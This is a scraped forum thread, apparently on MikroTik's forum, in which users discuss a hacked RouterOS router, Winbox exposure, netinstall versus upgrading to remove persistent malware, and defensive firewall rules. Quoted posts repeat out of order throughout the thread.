1. Winbox isn't open to the Internet, I have a firewall that accepts only connections from my address list.I agree, until you know more that title is speculation and unnecessary.
It could be just as accurate to state, IM AN INSECURE ADMIN HELP.
Why would you leave WInbox open to the internet?
Did you at least use Port Knocking techniques?
Why was access not via VPN.
Was the router hacked previously and not reconfigured via netinstall??
mrz, are you sure you are MT support LOL. From all my simple readings, a re-install does not cure a properly hacked unit (from the hackers perspective), one needs to do a NET INSTALL (which I gather erases memory that a normal reinstall doesn't touch??)Currently there is no new known winbox port vulnerabilities.
If you are sure that after first hack you reinstalled the route rand changed login credentials, then contact support.
There are cases that routers get "hacked" even after upgrade, because already stolen credentials was not changed.
Sorry to hear about your issue Redmond. However, for router access, I wouldnt count on source list protection as being a good security practice. Perhaps with a server of some sort that is isolated from ones LAN, that may be sufficient and assuming that the server has credentials login, BUT to the router NO EFFING WAY.1. Winbox isn't open to the Internet, I have a firewall that accepts only connections from my address list.I agree, until you know more that title is speculation and unnecessary.
It could be just as accurate to state, IM AN INSECURE ADMIN HELP.
Why would you leave WInbox open to the internet?
Did you at least use Port Knocking techniques?
Why was access not via VPN.
Was the router hacked previously and not reconfigured via netinstall??
2. I don't use port knocking.
3. I don't need VPN access for this, I'm the ISP of the customer.
4. Yes, but I don't know if it's the same vulnerability that has been spotted in April, I already found alexey attacks that blocks that vulnerability with firewall, but this isn't the case.
If you are talking about malware, then :mrz, are you sure you are MT support LOL. From all my simple readings, a re-install does not cure a properly hacked unit (from the hackers perspective), one needs to do a NET INSTALL (which I gather erases memory that a normal reinstall doesn't touch??)Currently there is no new known winbox port vulnerabilities.
If you are sure that after first hack you reinstalled the route rand changed login credentials, then contact support.
There are cases that routers get "hacked" even after upgrade, because already stolen credentials was not changed.
In this particular case I have a dst-nat with dst-port 8292 and to-ports 8291 (for example to-addresses 192.168.88.2) and no other ports forwarded.Sorry to hear about your issue Redmond. However, for router access, I wouldnt count on source list protection as being a good security practice. Perhaps with a server of some sort that is isolated from ones LAN, that may be sufficient and assuming that the server has credentials login, BUT to the router NO EFFING WAY.1. Winbox isn't open to the Internet, I have a firewall that accepts only connections from my address list.I agree, until you know more that title is speculation and unnecessary.
It could be just as accurate to state, IM AN INSECURE ADMIN HELP.
Why would you leave WInbox open to the internet?
Did you at least use Port Knocking techniques?
Why was access not via VPN.
Was the router hacked previously and not reconfigured via netinstall??
2. I don't use port knocking.
3. I don't need VPN access for this, I'm the ISP of the customer.
4. Yes, but I don't know if it's the same vulnerability that has been spotted in April, I already found alexey attacks that blocks that vulnerability with firewall, but this isn't the case.
I just wanted to comment on you seemed to indicate that you made an accept rule for your address list??
You should do that all on the NAT rule.....
ex.
add action=dst-nat chain=dstnat comment=Solar_UDP dst-port=zz \
in-interface-list=WAN log=yes protocol=udp src-address-list=Solar_Panel \
to-addresses=192.168.z.zz
The best thing to do is to take the RB, burn it and use another one updated.mrz, are you sure you are MT support LOL. From all my simple readings, a re-install does not cure a properly hacked unit (from the hackers perspective), one needs to do a NET INSTALL (which I gather erases memory that a normal reinstall doesn't touch??)Currently there is no new known winbox port vulnerabilities.
If you are sure that after first hack you reinstalled the route rand changed login credentials, then contact support.
There are cases that routers get "hacked" even after upgrade, because already stolen credentials was not changed.
"Regardless of version used, all RouterOS versions that have the default firewall enabled, are not vulnerable"Anav ... should mrz explain again and again and step by step what to do when you are hacked or could expect that autor is aware of https://blog.mikrotik.com/
/ip firewall filter
add action=drop chain=input comment=INVALID connection-state=invalid disabled=no
add action=accept chain=input comment="ADMIN" disabled=no src-address-list=admin
add action=accept chain=input comment="Bandwidth Test" disabled=no dst-port=2000 protocol=tcp
add action=accept chain=input comment=ICMP disabled=no protocol=icmp
add action=accept chain=input comment=DNS disabled=no dst-port=53 in-interface=ether1 protocol=tcp
add action=accept chain=input comment=DNS disabled=no dst-port=53 in-interface=ether1 protocol=udp
add action=accept chain=input comment=ESTABLISHED connection-state=established disabled=no
add action=accept chain=input comment=RELATED connection-state=related disabled=no
add action=accept chain=input comment=BROADCAST disabled=no dst-address=255.255.255.255
add action=drop chain=input disabled=no
/ip firewall filter
add action=drop chain=input comment=INVALID connection-state=invalid disabled=no
add action=accept chain=input comment="ADMIN" disabled=no src-address-list=admin
add action=accept chain=input comment="Bandwidth Test" disabled=no dst-port=2000 protocol=tcp
add action=accept chain=input comment=ICMP disabled=no protocol=icmp
add action=accept chain=input comment=DNS disabled=no dst-port=53 in-interface=ether1 protocol=tcp
add action=accept chain=input comment=DNS disabled=no dst-port=53 in-interface=ether1 protocol=udp
add action=accept chain=input comment=ESTABLISHED connection-state=established disabled=no
add action=accept chain=input comment=RELATED connection-state=related disabled=no
add action=accept chain=input comment=BROADCAST disabled=no dst-address=255.255.255.255
add action=drop chain=input disabled=no
#1: I don't think so. Netinstall does a low level format where as downgrade / upgrade is only an extra step to a ROS version change. I'd go with Netinstall.Side remark/question here:
1.)
instead of netinstall (need to press that button, set IP on the computer), is a down grade and then an upgrade
of ROS equivalent to netinstall and erases all internal memory safely?
2.)
I assume once you have a clean router, if you use a "backup" taken on an infected router, could hidden SW/memory be installed
again? (I am not talking about the normal settings a hacker could have injected like additional users, scripts etc.)
While you might be right about hidden backdoors not being stored in backup file, the problem is that backup files are binary and it's hard to be sure there aren't some scripts in it that would re-instate the hidden backdoor. Who knows, deeply hidden backdoor might change behaviour of /system backup ...#2: I'm willing to bet on "no". If netinstall is required to flush hidden stuff, I'd think that backup/restore, asides from what you've mentionned, would not bring the hidden hacks back.
Thank you Sir!While you might be right about hidden backdoors not being stored in backup file, the problem is that backup files are binary and it's hard to be sure there aren't some scripts in it that would re-instate the hidden backdoor. Who knows, deeply hidden backdoor might change behaviour of /system backup ...#2: I'm willing to bet on "no". If netinstall is required to flush hidden stuff, I'd think that backup/restore, asides from what you've mentionned, would not bring the hidden hacks back.
So when one goes to level of precaution to netinstall the device, it would be prudent to also not use the configuration backup which one can not verify for malicious contents.
Easy for you to fix language slips ... even for a Canadian one can assume with high level of confidence that he is an English native speaker. Whereas for resident of continental Europe one can hardly do the same.... fixed one word for you though
I am sure your spoken and written English is far superior to my basic French writing and speaking and my basic Spanish speaking. Mein namma ist Anav is all the German I know besides the usual, milch and German Football clubs LOL. As for the rest, I'm only interested when those of the opposite gender speak english with a native accent...... So sizzling hot!!!Easy for you to fix language slips ... even for a Canadian one can assume with high level of confidence that he is an English native speaker. Whereas for resident of continental Europe one can hardly do the same.... fixed one word for you though
This is just as unsafe (if not worse) as opening Winbox. PPTP, OpenVPN, IPsec etc are all custom Mikrotik implementations of protocols just like Winbox, except with much more complexity. I have no doubts serious security flaws exist in them, just no one has taken the time to look for them yet.You should setup VPN instead like PPTP, OVPN. etc.much safer
RouterOS can’t know which config is added by you, which added by rogue user, so either you check the config by hand or clear all of it. RouterOS can remove tools and scripts and such
RouterOS can’t know which config is added by you, which added by rogue user, so either you check the config by hand or clear all of it. RouterOS can remove tools and scripts and such
But in /export it's easy to see what a rogue user did.
With old versions having root exploits then it's entirely possible for the malware to protect itself and persist after an upgrade. Any compromised device should be netinstalled for security (until we end up with malware that persists in the bootloader...)If you are talking about malware, then :
"Simply upgrading RouterOS software deletes the malware, any other 3rd party files and closes the vulnerability"